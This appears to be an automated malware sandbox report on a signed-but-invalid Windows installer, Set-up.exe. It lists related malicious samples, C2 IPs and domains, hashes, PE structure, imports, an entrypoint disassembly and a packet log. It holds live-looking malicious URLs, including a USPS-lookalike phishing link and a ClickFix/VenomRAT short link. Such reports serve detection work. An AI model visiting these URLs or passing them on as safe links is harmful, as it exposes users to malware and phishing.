Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.147.147.173	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
34.200.57.114	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse
	joE9s9sbv0.exe	Get hash	malicious	Unknown	Browse
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse
	JbN2WYseAr.exe	Get hash	malicious	Unknown	Browse
	r8nllkNEQX.exe	Get hash	malicious	Unknown	Browse
	ivHDHq51Ar.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
home.eleventj11vt.top	Set-up.exe	Get hash	malicious	Unknown	Browse	194.87.58.155
httpbin.org	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Prs9eAnu2k.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	joE9s9sbv0.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	JbN2WYseAr.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	r8nllkNEQX.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	yqUQPPp0LM.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	ivHDHq51Ar.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	ZN34wF8WI2.exe	Get hash	malicious	Unknown	Browse	34.197.122.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Prs9eAnu2k.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	joE9s9sbv0.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	JbN2WYseAr.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	r8nllkNEQX.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	yqUQPPp0LM.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	ivHDHq51Ar.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	ZN34wF8WI2.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
ATGS-MMD-ASUS	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	34.147.147.173
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	34.147.147.173
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	34.147.147.173
	http://usps.com-trackaddn.top/l	Get hash	malicious	Unknown	Browse	34.54.88.138
	cbr.x86.elf	Get hash	malicious	Mirai	Browse	57.13.227.38
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	34.36.178.232
	kwari.ppc.elf	Get hash	malicious	Unknown	Browse	48.233.101.215
	kwari.arm.elf	Get hash	malicious	Unknown	Browse	57.204.182.195
	kwari.mpsl.elf	Get hash	malicious	Unknown	Browse	57.206.149.213
	kwari.arm7.elf	Get hash	malicious	Mirai	Browse	34.31.161.194

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.909645086783083
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	7'793'288 bytes
MD5:	3d060ec62ad0864cfd0d40f46a4f07a9
SHA1:	8caba4598d19477a1e4442c4c710fa3909023c5b
SHA256:	6f80bb8b470640ae7542eb1b239f2a790d61047254accccf747c4d64907fec66
SHA512:	40e7f3407eec75b9ea5027387e2e5de294e6131f6ef00cda7640a6fb93a7e514683895066e509df817fd4de85854969fba8d01dedb40826e4bb59e28981f127d
SSDEEP:	49152:zINwrsavev5BI2tev8aclalc6UnNaxT1jvwgJr0vJnWShbKsqBIKTlblgPyz8wA/:zIQsX5BMvh64cxnMxRjVJQxPKTSyz8/
TLSH:	A8763951EE8790F9C58315715016B37F6E34AF00A835DEB6CFD1FB34DA72A12AA0E618
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sg...............(..K...v..2...........0K...@..........................pw.....5.v...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6773C307 [Tue Dec 31 10:10:15 2024 UTC]
TLS Callbacks:	0x7890e0, 0x789090
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	51b39aff649af7abc30a06f2362db069

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
Signature Validation Error:	A certificate chain could not be built to a trusted root authority
Error Number:	-2146762486
Not Before, Not After	26/08/2024 17:01:06 21/08/2025 17:01:06
Subject Chain	CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
Version:	3
Thumbprint MD5:	80B98BC56A1BC892D2F111169DBCB122
Thumbprint SHA-1:	ED3C9DEEB4AD4483F925E20DD4695116DADC4D67
Thumbprint SHA-256:	0A1BB301BB5F2A584E394CCF57086623A464843269DD8A115FA4FC3509DB3EDC
Serial:	33009F7B734DB0480411EB0BBA0000009F7B73

Entrypoint Preview

Instruction
mov dword ptr [00B3B658h], 00000001h
jmp 00007F7774B7DE16h
nop
mov dword ptr [00B3B658h], 00000000h
jmp 00007F7774B7DE06h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F7774F05676h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 009E2000h
call dword ptr [00B3D9A8h]
sub esp, 04h
test eax, eax
je 00007F7774B7E1D5h
mov ebx, eax
mov dword ptr [esp], 009E2000h
call dword ptr [00B3DA1Ch]
mov edi, dword ptr [00B3D9BCh]
sub esp, 04h
mov dword ptr [00B39028h], eax
mov dword ptr [esp+04h], 009E2013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 009E2029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [008B3004h], eax
test esi, esi
je 00007F7774B7E173h
mov dword ptr [esp+04h], 00B3902Ch
mov dword ptr [esp], 00B34104h
call esi
mov dword ptr [esp], 00401580h
call 00007F7774B7E0C3h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73d000	0x2dac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x76e400	0x688	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x742000	0x3441c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x729c20	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x73d814	0x620	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4b1afc	0x4b1c00	0376523a3320321e6f615080586e83ab	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4b3000	0x12e024	0x12e200	5b3503c3e26e0a34435a86db21560bd8	False	0.020004783822920976	dBase III DBT, version number 0, next free block index 10, 1st item "1={"	0.29475031293532666	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5e2000	0x151a58	0x151c00	879e9493847d67b979679fddd1d64dca	False	0.42061941964285715	data	6.277693877886275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x734000	0x4d64	0x4e00	6c17222928a7366f1135f39586b97ba6	False	0.3195612980769231	data	4.898658234523789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x739000	0x3180	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x73d000	0x2dac	0x2e00	567768f33a53c46b0def6d69e22b7524	False	0.36931046195652173	data	5.457987373518599	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x740000	0x30	0x200	fe2a65d4187b984679c52ae93485940e	False	0.0625	data	0.2233456448570176	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x741000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x742000	0x3441c	0x34600	02e0623c7d8d841233f429ead242f2e6	False	0.49903975238663484	data	6.65692879978424	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
bcrypt.dll	BCryptGenRandom
CRYPT32.dll	CertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
GDI32.dll	BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
gdiplus.dll	GdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
IPHLPAPI.DLL	ConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
KERNEL32.dll	AcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
msvcrt.dll	__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
ole32.dll	CreateStreamOnHGlobal
SHELL32.dll	SHGetKnownFolderPath
api-ms-win-crt-convert-l1-1-0.dll	atoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
api-ms-win-crt-environment-l1-1-0.dll	__p__environ, __p__wenviron, getenv
api-ms-win-crt-filesystem-l1-1-0.dll	_fstat64, _stat64, _unlink
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, calloc, free, malloc, realloc
api-ms-win-crt-locale-l1-1-0.dll	setlocale
api-ms-win-crt-math-l1-1-0.dll	_fdopen
api-ms-win-crt-private-l1-1-0.dll	memchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
api-ms-win-crt-runtime-l1-1-0.dll	_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
api-ms-win-crt-stdio-l1-1-0.dll	__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
api-ms-win-crt-string-l1-1-0.dll	_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
api-ms-win-crt-time-l1-1-0.dll	__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
api-ms-win-crt-utility-l1-1-0.dll	_byteswap_uint64, bsearch, qsort, rand, srand
USER32.dll	CharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
WS2_32.dll	WSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 16:42:12.330857038 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:42:12.330900908 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:42:12.330960035 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:42:12.333822966 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:42:12.333837986 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:42:13.015984058 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:42:13.016459942 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:42:13.016482115 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:42:13.017995119 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:42:13.018054008 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:42:13.019407988 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:42:13.019479990 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:42:13.028412104 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:42:13.028422117 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:42:13.083158016 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:42:13.159773111 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:42:13.159822941 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:42:13.159913063 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:42:13.160870075 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:42:13.160891056 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:42:25.676491022 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.681356907 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.681444883 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.682598114 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.687449932 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.687465906 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.687491894 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.687504053 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.687517881 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.687525988 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.687560081 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.687575102 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.687645912 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.687659979 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.687707901 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.687803984 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.687817097 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.687854052 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.687869072 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.692081928 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.692133904 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.692326069 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.692338943 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.692379951 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.692395926 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.692409039 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.692437887 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.692451954 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.692472935 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.692514896 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.735059023 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.735238075 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.782934904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.783005953 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.834916115 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.834988117 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.888561010 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.888659000 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.934957027 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.935153008 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:25.982990980 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:25.983263969 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.030960083 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.031052113 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.082954884 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.083141088 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.125679970 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.126025915 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.138358116 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138375044 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138390064 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138401985 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138413906 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138425112 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138437986 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138449907 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138461113 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138473034 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138484955 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138497114 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138508081 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138519049 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138530970 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138541937 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138552904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138569117 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138581038 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138592005 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138603926 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138607979 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.138616085 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138628960 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138639927 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138653994 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138669014 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138679981 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138690948 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138703108 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.138714075 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.141069889 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.143548965 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143564939 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143604994 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.143624067 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.143656969 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143671036 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143682003 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143702030 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.143718004 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143724918 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.143858910 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143871069 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143892050 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143903017 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143917084 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143979073 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.143990040 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.144011021 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.144022942 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.144062042 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.144073963 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.144115925 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.144128084 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.144150972 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.144161940 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.144228935 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.144239902 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.145179033 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.145962000 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.145973921 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146020889 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.146050930 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:42:26.146059036 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146073103 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:42:26.146100044 CET	49731	80	192.168.2.4	34.147.147.173
